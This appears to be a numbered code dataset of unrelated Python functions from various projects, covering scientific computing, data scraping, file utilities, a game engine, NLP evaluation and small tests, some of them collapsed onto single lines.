def get_shapley(csv_filename, modalities = ["t1", "t1ce", "t2", "flair"]): """ calculate modality shapeley value CSV with column: t1, t1c, t2, flair, of 0 / 1. and perforamnce value. :param csv: :return: """ # convert csv to dict: {(0, 0, 1, 0): 10} {tuple: performance} df = pd.read_csv(csv_filename) fold = Path(csv_filename).name.split('.')[0].split('_')[-1] # print(fold) df_dict = df.to_dict(orient='records') # print(df_dict) v_dict = {} # for row in df_dict: mod_lst = [] for m in modalities: mod_lst.append(row[m]) v_dict[tuple(mod_lst)] = row['accuracy'] # print(v_dict) n = len(modalities) # sanity check if all mod combinations are exists N_sets = list(itertools.product([0,1],repeat = len(modalities))) # set of all_combinations for s in N_sets: if tuple(s) not in v_dict: print("ERROR in get_shapley! {} missing".format(s)) N_sets_array = np.array(N_sets) # array([[0, 0, 0, 0], [0, 0, 0, 1], mod_shapley = {} # for each mod, calculate its shapley value: for i, mod in enumerate(modalities): # get combination not including mod n_not_i = N_sets_array[N_sets_array[:, i]==0]# # a list containing all subsets that don't contains i todo # print(n_not_i, i) phi_i= 0 for s in n_not_i: # print('s', s) v_s = v_dict[tuple(s)] sANDi = copy.deepcopy(s) sANDi[i] =1 v_sANDi = v_dict[tuple(sANDi)] # print(s , s.sum(), i, mod) phi_i += (v_sANDi - v_s) * math.factorial(s.sum()) * (math.factorial(n - s.sum() - 1)) / math.factorial(n) mod_shapley[mod] = phi_i mod_shapley['fold'] = fold print(mod_shapley) # save gt shapley to csv with open(Path(csv_filename).parent/'fold_{}_modality_shapley.csv'.format(fold), 'w') as f: csv_writer = csv.DictWriter(f, fieldnames=list(mod_shapley.keys())) csv_writer.writeheader() csv_writer.writerow(mod_shapley) # for key in mod_shapley.keys(): # f.write("%s,%s\n" % (key, mod_shapley[key])) return mod_shapley
29,467
def reload_all():
    """
    Resets all modules to the state they were in right after import_all
    returned.
    """

    import renpy.style
    import renpy.display

    # Clear all pending exceptions.
    # NOTE(review): sys.exc_clear() exists only on Python 2 -- confirm this
    # code path never runs on Python 3.
    sys.exc_clear()

    # Reset the styles.
    renpy.style.reset() # @UndefinedVariable

    # Shut down the cache thread.
    renpy.display.im.cache.quit()

    # Shut down the importer.
    renpy.loader.quit_importer()

    # Free memory.
    renpy.exports.free_memory()

    # GC renders.
    renpy.display.render.screen_render = None
    renpy.display.render.mark_sweep()

    # Get rid of the draw module and interface.
    renpy.display.draw.deinit()
    renpy.display.draw = None
    renpy.display.interface = None

    # Delete the store modules: both the 'store*' namespaces and the alias
    # 'renpy.store' must go so they are re-created from scratch on reload.
    for i in sys.modules.keys():
        if i.startswith("store") or i == "renpy.store":
            m = sys.modules[i]
            if m is not None:
                m.__dict__.reset()
            del sys.modules[i]

    # Restore the state of all modules from backup.
    backup.restore()

    renpy.display.im.reset_module()

    post_import()

    # Re-initialize the importer.
    renpy.loader.init_importer()
29,468
def quest_13(_x): """ Sample data for 1000 cells, with 200 genes, and 8 cell types. Cluster the data with k-means (k = 8) """ plt.subplot(121) plt.imshow(np.log(_x), cmap="binary", interpolation="nearest") plt.ylabel('Genes') plt.xlabel('Cells') plt.xlim(0,200) plt.ylim(0,200) plt.show() plt.subplot(122) kmeans = KMeans( n_clusters=8) k_pred = kmeans.fit_predict(_x.T) plt.imshow(np.log(_x.T[np.argsort(k_pred)].T), cmap="binary", interpolation="nearest") plt.ylabel('Genes') plt.xlabel('Cells') plt.xlim(0,200) plt.ylim(0,200) plt.show()
29,469
def demo_eval(chunkparser, text):
    """
    Demonstration code for evaluating a chunk parser, using a
    ``ChunkScore``.  This function assumes that ``text`` contains one
    sentence per line, and that each sentence has the form expected by
    ``tree.chunk``.  It runs the given chunk parser on each sentence in
    the text, and scores the result.  It prints the final score
    (precision, recall, and f-measure); and reports the set of chunks
    that were missed and the set of chunks that were incorrect.  (At
    most 10 missing chunks and 10 incorrect chunks are reported).

    :param chunkparser: The chunkparser to be tested
    :type chunkparser: ChunkParserI
    :param text: The chunked tagged text that should be used for
        evaluation.
    :type text: str
    """
    from nltk import chunk
    from nltk.tree import Tree

    # Evaluate our chunk parser.
    chunkscore = chunk.ChunkScore()

    for sentence in text.split("\n"):
        print(sentence)
        sentence = sentence.strip()
        if not sentence:
            continue
        # Parse the gold-standard chunking, re-parse its raw tokens with the
        # parser under test, and accumulate the comparison into chunkscore.
        gold = chunk.tagstr2tree(sentence)
        tokens = gold.leaves()
        test = chunkparser.parse(Tree("S", tokens), trace=1)
        chunkscore.score(gold, test)
        print()

    print("/" + ("=" * 75) + "\\")
    print("Scoring", chunkparser)
    print("-" * 77)
    print("Precision: %5.1f%%" % (chunkscore.precision() * 100), " " * 4, end=" ")
    print("Recall: %5.1f%%" % (chunkscore.recall() * 100), " " * 6, end=" ")
    print("F-Measure: %5.1f%%" % (chunkscore.f_measure() * 100))

    # Missed chunks.
    if chunkscore.missed():
        print("Missed:")
        missed = chunkscore.missed()
        for chunk in missed[:10]:
            print("  ", " ".join(map(str, chunk)))
        if len(chunkscore.missed()) > 10:
            print("  ...")

    # Incorrect chunks.
    if chunkscore.incorrect():
        print("Incorrect:")
        incorrect = chunkscore.incorrect()
        for chunk in incorrect[:10]:
            print("  ", " ".join(map(str, chunk)))
        if len(chunkscore.incorrect()) > 10:
            print("  ...")

    print("\\" + ("=" * 75) + "/")
    print()
29,470
def get_changepoint_values_from_config(
        changepoints_dict,
        time_features_df,
        time_col=cst.TIME_COL):
    """Applies the changepoint method specified in `changepoints_dict` to return the changepoint values

    :param changepoints_dict: Optional[Dict[str, any]]
        Specifies the changepoint configuration.
        "method": str
            The method to locate changepoints. Valid options:
                "uniform". Places n_changepoints evenly spaced changepoints to allow growth to change.
                "custom". Places changepoints at the specified dates.
            Additional keys to provide parameters for each particular method are described below.
        "continuous_time_col": Optional[str]
            Column to apply `growth_func` to, to generate changepoint features
            Typically, this should match the growth term in the model
        "growth_func": Optional[func]
            Growth function (scalar -> scalar). Changepoint features are created
            by applying `growth_func` to "continuous_time_col" with offsets.
            If None, uses identity function to use `continuous_time_col` directly
            as growth term
        If changepoints_dict["method"] == "uniform", this other key is required:
            "n_changepoints": int
                number of changepoints to evenly space across training period
        If changepoints_dict["method"] == "custom", this other key is required:
            "dates": Iterable[Union[int, float, str, datetime]]
                Changepoint dates. Must be parsable by pd.to_datetime. Changepoints
                are set at the closest time on or after these dates in the dataset.
    :param time_features_df: pd.Dataframe
        training dataset. contains column "continuous_time_col"
    :param time_col: str
        The column name in `time_features_df` representing time for the time series data
        The time column can be anything that can be parsed by pandas DatetimeIndex
        Used only in the "custom" method.
    :return: np.array
        values of df[continuous_time_col] at the changepoints
    :raises ValueError: if `changepoints_dict` is provided without a "method"
    :raises NotImplementedError: if the method is not one of "uniform", "custom"
    """
    if changepoints_dict is None:
        return None

    valid_changepoint_methods = ["uniform", "custom"]
    changepoint_method = changepoints_dict.get("method")
    continuous_time_col = changepoints_dict.get("continuous_time_col")

    if changepoint_method is None:
        # a specific exception type (was a bare `Exception`)
        raise ValueError("changepoint method must be specified")
    if changepoint_method not in valid_changepoint_methods:
        raise NotImplementedError(
            f"changepoint method {changepoint_method} not recognized. "
            f"Must be one of {valid_changepoint_methods}")

    changepoint_values = None
    if changepoint_method == "uniform":
        if changepoints_dict["n_changepoints"] > 0:
            # Only forward optional parameters that were actually provided,
            # so the helpers' own defaults apply otherwise.
            params = {}
            if continuous_time_col is not None:
                params["continuous_time_col"] = continuous_time_col
            changepoint_values = get_evenly_spaced_changepoints_values(
                df=time_features_df,
                n_changepoints=changepoints_dict["n_changepoints"],
                **params)
    else:  # changepoint_method == "custom"
        params = {}
        if time_col is not None:
            params["time_col"] = time_col
        if continuous_time_col is not None:
            params["continuous_time_col"] = continuous_time_col
        changepoint_values = get_custom_changepoints_values(
            df=time_features_df,
            changepoint_dates=changepoints_dict["dates"],
            **params)
    return changepoint_values
29,471
def jitChol(A, maxTries=10, warning=True): """Do a Cholesky decomposition with jitter. Description: U, jitter = jitChol(A, maxTries, warning) attempts a Cholesky decomposition on the given matrix, if matrix isn't positive definite the function adds 'jitter' and tries again. Thereafter the amount of jitter is multiplied by 10 each time it is added again. This is continued for a maximum of 10 times. The amount of jitter added is returned. Returns: U - the Cholesky decomposition for the matrix. jitter - the amount of jitter that was added to the matrix. Arguments: A - the matrix for which the Cholesky decomposition is required. maxTries - the maximum number of times that jitter is added before giving up (default 10). warning - whether to give a warning for adding jitter (default is True) See also CHOL, PDINV, LOGDET Copyright (c) 2005, 2006 Neil D. Lawrence """ jitter = 0 i = 0 while(True): try: # Try --- need to check A is positive definite if jitter == 0: jitter = abs(SP.trace(A))/A.shape[0]*1e-6 LC = linalg.cholesky(A, lower=True) return LC.T, 0.0 else: if warning: # pdb.set_trace() # plt.figure() # plt.imshow(A, interpolation="nearest") # plt.colorbar() # plt.show() logging.error("Adding jitter of %f in jitChol()." % jitter) LC = linalg.cholesky(A+jitter*SP.eye(A.shape[0]), lower=True) return LC.T, jitter except linalg.LinAlgError: # Seems to have been non-positive definite. if i<maxTries: jitter = jitter*10 else: raise linalg.LinAlgError, "Matrix non positive definite, jitter of " + str(jitter) + " added but failed after " + str(i) + " trials." i += 1 return LC
29,472
def stock_individual_info_em(symbol: str = "603777") -> pd.DataFrame:
    """
    East Money - individual stock - basic stock information.
    http://quote.eastmoney.com/concept/sh603777.html?from=classic
    :param symbol: stock code
    :type symbol: str
    :return: stock information (item/value pairs: code, name, total shares,
        float shares, industry, market caps, listing date)
    :rtype: pandas.DataFrame
    """
    # Map the bare stock code to the exchange-prefixed "secid" East Money uses.
    code_id_dict = code_id_map_em()
    url = "http://push2.eastmoney.com/api/qt/stock/get"
    params = {
        'ut': 'fa5fd1943c7b386f172d6893dbfba10b',
        'fltt': '2',
        'invt': '2',
        'fields': 'f120,f121,f122,f174,f175,f59,f163,f43,f57,f58,f169,f170,f46,f44,f51,f168,f47,f164,f116,f60,f45,f52,f50,f48,f167,f117,f71,f161,f49,f530,f135,f136,f137,f138,f139,f141,f142,f144,f145,f147,f148,f140,f143,f146,f149,f55,f62,f162,f92,f173,f104,f105,f84,f85,f183,f184,f185,f186,f187,f188,f189,f190,f191,f192,f107,f111,f86,f177,f78,f110,f262,f263,f264,f267,f268,f255,f256,f257,f258,f127,f199,f128,f198,f259,f260,f261,f171,f277,f278,f279,f288,f152,f250,f251,f252,f253,f254,f269,f270,f271,f272,f273,f274,f275,f276,f265,f266,f289,f290,f286,f285,f292,f293,f294,f295',
        "secid": f"{code_id_dict[symbol]}.{symbol}",
        '_': '1640157544804',
    }
    r = requests.get(url, params=params)
    data_json = r.json()
    temp_df = pd.DataFrame(data_json)
    # Turn the field codes (f57, f58, ...) into a regular column.
    temp_df.reset_index(inplace=True)
    # Drop response metadata columns that are not stock attributes.
    del temp_df['rc']
    del temp_df['rt']
    del temp_df['svr']
    del temp_df['lt']
    del temp_df['full']
    # Human-readable labels for the fields we keep (values are the Chinese
    # labels the public API of this function exposes; do not translate):
    # f57 stock code, f58 stock name, f84 total shares, f85 float shares,
    # f127 industry, f116 total market cap, f117 float market cap,
    # f189 listing date.
    code_name_map = {
        'f57': '股票代码',
        'f58': '股票简称',
        'f84': '总股本',
        'f85': '流通股',
        'f127': '行业',
        'f116': '总市值',
        'f117': '流通市值',
        'f189': '上市时间',
    }
    temp_df['index'] = temp_df['index'].map(code_name_map)
    # Keep only the mapped fields; unmapped ones became NaN above.
    temp_df = temp_df[pd.notna(temp_df['index'])]
    if 'dlmkts' in temp_df.columns:
        del temp_df['dlmkts']
    temp_df.columns = [
        'item',
        'value',
    ]
    temp_df.reset_index(inplace=True, drop=True)
    return temp_df
29,473
def InverseDynamicsTool_safeDownCast(obj):
    """
    InverseDynamicsTool_safeDownCast(OpenSimObject obj) -> InverseDynamicsTool

    SWIG-generated wrapper: safely downcast a generic OpenSim Object to an
    InverseDynamicsTool (returns None-equivalent if the cast is invalid).

    Parameters
    ----------
    obj: OpenSim::Object *

    """
    return _tools.InverseDynamicsTool_safeDownCast(obj)
29,474
def in_incident_root(current_dir_path):
    """
    Helper function to determine if a sub directory is a child of an incident
    directory.  Useful for setting default params in tools that take an
    incident directory as an input.

    A directory qualifies when it is named ``tools`` and its parent is named
    like ``NNNN_Name`` (four digits, underscore, letters).

    :param current_dir_path: String of the path being evaluated
    :return: tuple of (lower-cased parent directory path, boolean indicating
        whether the parent directory matches the incident dir pattern)
    """
    parent_dir_path, current_dir_name = os.path.split(current_dir_path)
    matches_incident_pattern = (
        current_dir_name == 'tools'
        and re.match(r'\d{4}_[a-zA-Z]*', os.path.basename(parent_dir_path)) is not None
    )
    return parent_dir_path.lower(), matches_incident_pattern
29,475
def build_decoder(encoding_dim, sparse):
    """Build and return the decoder, linked with its matching encoder."""
    img_input = Input(shape=(28 * 28,))
    # Run the input through the (possibly sparse) encoder first.
    encoded = build_encoder(encoding_dim, sparse)(img_input)
    # Expanding dense stack that reconstructs the flattened image.
    hidden = Dense(64, activation='relu')(encoded)
    hidden = Dense(128, activation='relu')(hidden)
    reconstruction = Dense(28 * 28, activation='relu')(hidden)
    return Model(img_input, reconstruction)
29,476
def find_usable_exits(room, stuff):
    """
    Given a room, and the player's stuff, classify the room's exits.

    Hidden exits are skipped entirely.  Every visible exit is returned in
    ``usable``; exits whose required key the player is NOT carrying are
    additionally returned in ``missing_key`` so the caller can present
    them as locked.  (The original docstring claimed key-locked exits were
    excluded from ``usable``; the code has always included them, and that
    behavior is preserved here.  Unreachable dead code removed.)

    :param room: room dict with an 'exits' list of exit dicts
    :param stuff: collection of item names the player is carrying
    :return: (usable, missing_key) tuple of exit lists
    """
    usable = []
    missing_key = []
    for exit in room['exits']:
        # Hidden exits are never shown.
        if exit.get("hidden", False):
            continue
        # Record locked exits so the caller can report the missing key.
        if "required_key" in exit and exit["required_key"] not in stuff:
            missing_key.append(exit)
        usable.append(exit)
    return usable, missing_key
29,477
def test_1_1_1_4_file_mode(host):
    """
    CIS Ubuntu 20.04 v1.0.0 - Rule # 1.1.1.4
    Tests if /etc/modprobe.d/1.1.1.4_hfs.conf has 0644 mode
    """
    # `host` is the testinfra fixture; HFS_MOD_FILE is the module-level
    # constant holding the path of the hfs modprobe drop-in file.
    assert host.file(HFS_MOD_FILE).mode == 0o644
29,478
def get_normal_map(x, area_weighted=False):
    """
    Compute per-pixel surface normals from a map of 3D positions.

    x: [bs, h, w, 3] (x,y,z) -> (nx,ny,nz)

    For each pixel, vectors to 6 of its 8 neighbours are formed, and cross
    products of consecutive neighbour vectors yield face normals that are
    summed.  Unless `area_weighted` is True, the sum is L2-normalized;
    NaNs (from zero-length normals) are replaced with zeros.

    NOTE(review): uses TF1-era APIs (tf.cross, tf.is_nan) — confirm the
    target TensorFlow version before upgrading.
    """
    nn = 6
    p11 = x
    # Zero-pad height and width by 1 so every pixel has all its neighbours.
    p = tf.pad(x, tf.constant([[0,0], [1,1], [1,1], [0,0]]))
    p11 = p[:, 1:-1, 1:-1, :]  # center pixel (overwrites the assignment above)
    # Neighbours, named pRC by (row, col) offset in the padded map:
    p10 = p[:, 1:-1, 0:-2, :]  # offset ( 0, -1)
    p01 = p[:, 0:-2, 1:-1, :]  # offset (-1,  0)
    p02 = p[:, 0:-2, 2:, :]    # offset (-1, +1)
    p12 = p[:, 1:-1, 2:, :]    # offset ( 0, +1)
    p20 = p[:, 2:, 0:-2, :]    # offset (+1, -1)
    p21 = p[:, 2:, 1:-1, :]    # offset (+1,  0)
    pos = [p10, p01, p02, p12, p21, p20]
    # Turn each neighbour position into a vector from the center pixel.
    for i in range(nn):
        pos[i] = tf.subtract(pos[i], p11)
    normals = []
    # Cross consecutive neighbour vectors to get face normals.
    # NOTE(review): only 5 of the 6 consecutive pairs are crossed — the
    # wrap-around pair (pos[0], pos[5]) is skipped; confirm this is intended.
    for i in range(1, nn):
        normals.append(tf.cross(pos[i%nn], pos[(i-1+nn)%nn]))
    normal = tf.reduce_sum(tf.stack(normals), axis=0)
    if not area_weighted:
        normal = tf.nn.l2_normalize(normal, 3)
    # Degenerate pixels produce NaNs after normalization; zero them out.
    normal = tf.where(tf.is_nan(normal), tf.zeros_like(normal), normal)
    return normal
29,479
def get_example_models():
    """Generator that yields the model objects for all example models"""
    example_dir = os.path.join(os.path.dirname(__file__), '..', 'examples')
    for filename in os.listdir(example_dir):
        # Only plain model modules: skip run scripts and dunder files.
        is_model_source = (
            filename.endswith('.py')
            and not filename.startswith('run_')
            and not filename.startswith('__')
        )
        if not is_model_source:
            continue
        modelname = filename[:-3]  # strip .py
        module = importlib.import_module('pysb.examples.' + modelname)
        # Reset do_export to the default in case the model changed it.
        # FIXME the self-export mechanism should be more self-contained so
        # this isn't needed here.
        SelfExporter.do_export = True
        yield module.model
29,480
def check_dtype(array, allowed):
    """Raises TypeError if the array is not of an allowed dtype.

    :param array: array whose dtype is to be checked
    :param allowed: instance or list of allowed dtypes
    :raises: TypeError
    """
    # Normalize a single dtype into a one-element list.
    allowed_dtypes = allowed if hasattr(allowed, "__iter__") else [allowed]
    if array.dtype not in allowed_dtypes:
        raise TypeError(
            "Invalid dtype {}. Allowed dtype(s): {}".format(array.dtype, allowed_dtypes))
29,481
def initPeaksFromControlPoints(peakSelectionModel, controlPoints, context=None):
    """Initialize peak selection model using control points object

    The model is cleared first, then one peak group is appended per
    labelled group in `controlPoints`.

    :param peakSelectionModel: PeakSelectionModel to populate
    :param controlPoints: pyFAI.control_points.ControlPoints to import
    :param context: optional CalibrationContext; defaults to the singleton
    :raises TypeError: if either argument has an unexpected type
    :return: None (the original ":rtype: ControlPoints" was inaccurate —
        this function mutates `peakSelectionModel` in place)
    """
    if not isinstance(peakSelectionModel, PeakSelectionModel):
        raise TypeError("Unexpected model type")
    if not isinstance(controlPoints, ControlPoints):
        raise TypeError("Unexpected model type")

    if context is None:
        context = CalibrationContext.instance()

    peakSelectionModel.clear()
    for label in controlPoints.get_labels():
        group = controlPoints.get(lbl=label)
        # The marker color is derived from the group's ring index.
        color = context.getMarkerColor(group.ring)
        points = numpy.array(group.points)
        peakModel = createRing(points, peakSelectionModel=peakSelectionModel, context=context)
        # NOTE(review): ring numbers appear to be 0-based in ControlPoints
        # and 1-based in the peak model — confirm against pyFAI conventions.
        peakModel.setRingNumber(group.ring + 1)
        peakModel.setColor(color)
        peakModel.setName(label)
        peakSelectionModel.append(peakModel)
29,482
def _ros_group_rank(df, dl_idx, censorship): """ Ranks each observation within the data groups. In this case, the groups are defined by the record's detection limit index and censorship status. Parameters ---------- df : pandas.DataFrame dl_idx : str Name of the column in the dataframe the index of the observations' corresponding detection limit in the `cohn` dataframe. censorship : str Name of the column in the dataframe that indicates that a observation is left-censored. (i.e., True -> censored, False -> uncensored) Returns ------- ranks : numpy.array Array of ranks for the dataset. """ # (editted for pandas 0.14 compatibility; see commit 63f162e # when `pipe` and `assign` are available) ranks = df.copy() ranks.loc[:, 'rank'] = 1 ranks = ( ranks.groupby(by=[dl_idx, censorship])['rank'] .transform(lambda g: g.cumsum()) ) return ranks
29,483
def f_all(predicate, iterable):
    """Return whether predicate(i) is True for all i in iterable

    >>> is_odd = lambda num: (num % 2 == 1)
    >>> f_all(is_odd, [])
    True
    >>> f_all(is_odd, [1, 3, 5, 7, 9])
    True
    >>> f_all(is_odd, [2, 1, 3, 5, 7, 9])
    False
    """
    # all() short-circuits on the first falsy result, and map() is lazy.
    return all(map(predicate, iterable))
29,484
def vcpu_affinity_output(vm_info, i, config):
    """
    Output the vcpu affinity

    :param vm_info: the data structure holding all the xml item values
    :param i: the index of the vm id
    :param config: file pointer to store the information
    """
    # The service OS VM gets no explicit affinity entry.
    if vm_info.load_order[i] == "SOS_VM":
        return
    bitmap = vm_info.get_cpu_bitmap(i)
    print("\t\t.vcpu_num = {}U,".format(bitmap['cpu_num']), file=config)
    print("\t\t.vcpu_affinity = VM{}_CONFIG_VCPU_AFFINITY,".format(i), file=config)
29,485
def _recursive_replace(data): """Searches data structure and replaces 'nan' and 'inf' with respective float values""" if isinstance(data, str): if data == "nan": return float("nan") if data == "inf": return float("inf") if isinstance(data, List): return [_recursive_replace(v) for v in data] if isinstance(data, Tuple): return tuple([_recursive_replace(v) for v in data]) if isinstance(data, Set): return set([_recursive_replace(v) for v in data]) if isinstance(data, Dict): return {k: _recursive_replace(v) for k, v in data.items()} return data
29,486
def m3_change_emotion(rosebot, emotionnum):
    """
    Change the robot's emotion from an entry widget without crashing when
    the requested number is too large.

    :type rosebot: rb.RoseBot
    :param emotionnum: requested emotion number; must be less than 7
    :return:
    """
    # Guard clause: reject out-of-range requests instead of forwarding them.
    if emotionnum >= 7:
        print("You picked a number which was too large")
        return
    rosebot.m3_emotion_system.change_emotion(emotionnum)
29,487
def user(request, user_id):
    """Displays a User and various information about them."""
    # View stub: not yet implemented.
    raise NotImplementedError
29,488
def test_add_alternative_cds():
    """Test add_alternative_cds from CDS class"""
    # `cds_list` is a module-level fixture of CDS objects; registering the
    # second CDS as an alternative of the first should add exactly one entry.
    cds_list[0].add_alternative_cds(cds_list[1])
    assert len(cds_list[0].alternative_cds) == 1
29,489
def trans_text_ch_to_vector(txt_file, word_num_map, txt_label=None):
    """
    Translate Chinese characters into a vector of word indices.

    Characters are looked up by their UTF-8 encoding in ``word_num_map``;
    unknown characters map to the out-of-vocabulary index
    ``len(word_num_map)``.

    :param txt_file: path of a text file to read; if not None it takes
        precedence and its content replaces ``txt_label``
    :param word_num_map: dict mapping UTF-8 encoded characters to indices
    :param txt_label: text to translate when ``txt_file`` is None
    :return: list of indices, one per character
    """
    words_size = len(word_num_map)

    def to_num(word):
        # Unknown characters fall back to the out-of-vocabulary index.
        return word_num_map.get(word.encode('utf-8'), words_size)

    # `is not None` instead of the original `!= None` comparison.
    if txt_file is not None:
        txt_label = get_ch_lable(txt_file)
    return list(map(to_num, txt_label))
29,490
def adjust_bag(request, item_id):
    """ Adjust the quantity of a product to the specified amount

    A quantity of 0 or less leaves the bag unchanged and shows an error
    message instead.
    """
    # Prefixing '0' tolerates an empty string ('' -> 0); defaulting the
    # missing field to '' avoids the TypeError the original raised when
    # 'quantity' was absent from the POST data.
    quantity = int('0' + request.POST.get('quantity', ''))

    bag = request.session.get('bag', {})

    if quantity > 0:
        bag[item_id] = quantity
    else:
        # Message grammar fixed ("must greather than" -> "must be greater
        # than") and the stray line-continuation whitespace removed.
        messages.error(
            request,
            'Value must be greater than or equal to 1. '
            'If you do not need this product, click on the Remove button.')

    request.session['bag'] = bag
    return redirect(reverse('view_bag'))
29,491
def get_file_paths_in_dir(idp,
                          ext=None,
                          target_str_or_list=None,
                          ignore_str_or_list=None,
                          base_name_only=False,
                          without_ext=False,
                          sort_result=True,
                          natural_sorting=False,
                          recursive=False):
    """Collect the file paths inside ``idp`` with optional filtering.

    ``ext`` can be a list of extensions or a single extension
    (e.g. ['.jpg', '.png'] or '.jpg'); matching is case-insensitive.
    ``target_str_or_list`` / ``ignore_str_or_list`` keep / drop paths whose
    basename contains the given substring(s).  The result can be reduced to
    basenames, stripped of extensions, and sorted (lexicographically or
    naturally).
    """
    # Gather candidate file paths, optionally walking subdirectories.
    if recursive:
        paths = []
        for root, _dirs, files in os.walk(idp):
            paths.extend(os.path.join(root, name) for name in files)
    else:
        paths = [
            os.path.join(idp, name) for name in os.listdir(idp)
            if os.path.isfile(os.path.join(idp, name))
        ]

    # Extension filter (case-insensitive; single value or list).
    if ext is not None:
        if isinstance(ext, list):
            ext = [item.lower() for item in ext]
            check_ext(ext)
            paths = [p for p in paths if os.path.splitext(p)[1].lower() in ext]
        else:
            ext = ext.lower()
            check_ext(ext)
            paths = [p for p in paths if os.path.splitext(p)[1].lower() == ext]

    # Keep only basenames containing every target substring.
    if target_str_or_list is not None:
        if type(target_str_or_list) == str:
            target_str_or_list = [target_str_or_list]
        for needle in target_str_or_list:
            paths = [p for p in paths if needle in os.path.basename(p)]

    # Drop basenames containing any ignored substring.
    if ignore_str_or_list is not None:
        if type(ignore_str_or_list) == str:
            ignore_str_or_list = [ignore_str_or_list]
        for needle in ignore_str_or_list:
            paths = [p for p in paths if needle not in os.path.basename(p)]

    if base_name_only:
        paths = [os.path.basename(p) for p in paths]
    if without_ext:
        paths = [os.path.splitext(p)[0] for p in paths]
    if sort_result:
        paths = sorted(paths, key=natural_key) if natural_sorting else sorted(paths)
    return paths
29,492
def touch(filename):
    """ Creates an empty file if it does not already exist """
    # Append mode creates the file without truncating existing content;
    # the context manager guarantees the handle is closed.
    with open(filename, 'a'):
        pass
29,493
def test_connected_taskflow(ctx, proxy): """Test a connected taskflow""" # Now try a workflow that is the two connected together logging.info('Running taskflow that connects to parts together ...') taskflow_id = create_taskflow( proxy, 'cumulus.taskflow.core.test.mytaskflows.ConnectTwoTaskFlow') # Start the task flow proxy.put('taskflows/%s/start' % (taskflow_id)) # Wait for it to complete wait_for_taskflow_status(proxy, taskflow_id, 'complete')
29,494
def _condexpr_value(e):
    """Evaluate the value of the input expression.

    ``e`` is a nested tuple AST node: 3-tuples are binary operations
    (arithmetic, boolean, or comparisons); 2-tuples are unary ``not``,
    literal leaves ('string' / 'number' / 'boolean'), or configuration
    references ('identifier').

    :raises Exception: on an unrecognized node shape or operator.
    """
    assert type(e) == tuple
    assert len(e) in [2, 3]
    if len(e) == 3:
        # Arithmetic operators are delegated to the arithmetic evaluator.
        if e[0] in ARITH_SET:
            return _expr_value(e)
        left = _condexpr_value(e[1])
        right = _condexpr_value(e[2])
        if type(left) != type(right):
            # Boolean result expected
            return False
        elif e[0] == 'and':
            return left and right
        elif e[0] == 'or':
            return left or right
        elif e[0] == '=':
            return left == right
        elif e[0] == '!=':
            return left != right
        elif e[0] == '>':
            return left > right
        elif e[0] == '>=':
            return left >= right
        elif e[0] == '<':
            return left < right
        elif e[0] == '<=':
            return left <= right
    elif e[0] == 'not':
        return not _condexpr_value(e[1])
    elif e[0] in ['string', 'number', 'boolean']:
        # Literal leaf: the value is stored directly in the node.
        return e[1]
    elif e[0] == 'identifier':
        # Config option reference: look up its current value.
        return get_config(e[1])['value']
    raise Exception("Unexpected depend list: " + str(e))
29,495
def in6_isincluded(addr, prefix, plen):
    """
    Returns True when 'addr' belongs to prefix/plen. False otherwise.
    """
    # Mask the address with the /plen netmask and compare it against the
    # packed network prefix.
    addr_packed = inet_pton(socket.AF_INET6, addr)
    netmask = in6_cidr2mask(plen)
    network = inet_pton(socket.AF_INET6, prefix)
    return network == in6_and(addr_packed, netmask)
29,496
def check_datepaths(record):
    """
    Asserts that the given date paths return the same number of files,
    otherwise raises an informative error.
    """
    from .utils import make_date_path_pairs
    import pandas as pd

    # A few arbitrary probe dates spanning different years/months.
    sample_dates = pd.DatetimeIndex(
        ['2010-04-03', '2010-03-23', '2014-01-01', '2014-01-02'])

    paths = [record['remote']['url'], record['local_store']]
    if 'pipelines' in record:
        for name in record['pipelines']:
            paths.append(record['pipelines'][name]['data_path'])

    try:
        make_date_path_pairs(sample_dates, *paths)
    except AssertionError:
        raise ConfigError(
            'The given paths in the config file do not produce '
            'the same number of output files; e.g. there may be '
            'more URLs than LOCAL_PATHSs. Please check the date '
            'formatting of the following paths: \n' + '\n'.join(paths)
        )
29,497
def vis_channel(model, layer, channel_n):
    """
    This function creates a visualization for a single channel in a layer

    :param model: model we are visualizing
    :type model: lucid.modelzoo
    :param layer: the name of the layer we are visualizing
    :type layer: string
    :param channel_n: The channel number in the layer we are optimizing for
    :type channel_n: int
    :return: array of pixel values for the visualization
    """
    print('Getting vis for ' + layer + ', channel ' + str(channel_n))
    # Map the friendly layer name to the graph node name lucid expects.
    l_name = dla_lucid.LAYERS[layer][0]
    obj = objectives.channel(l_name, channel_n)
    # Render using the project's shared 1-D parameterization, thresholds
    # and transforms.
    imgs = render.render_vis(model, obj, dla_lucid.PARAM_1D, thresholds=dla_lucid.THRESH_1D, transforms=dla_lucid.TFORMS_1D, verbose=False)
    imgs_array = np.array(imgs)
    # NOTE(review): assumes the rendered output flattens to exactly 400
    # values — confirm against dla_lucid.PARAM_1D before changing sizes.
    imgs_reshaped = imgs_array.reshape(400)
    return imgs_reshaped
29,498
def _validate_fft_input(array: numpy.ndarray) -> None: """ Validate the fft input. Parameters ---------- array : numpy.ndarray Returns ------- None """ if not isinstance(array, numpy.ndarray): raise TypeError('array must be a numpy array') if not numpy.iscomplexobj(array): raise ValueError('array must have a complex data type') if array.ndim != 2: raise ValueError('array must be a two-dimensional array. Got shape {}'.format(array.shape))
29,499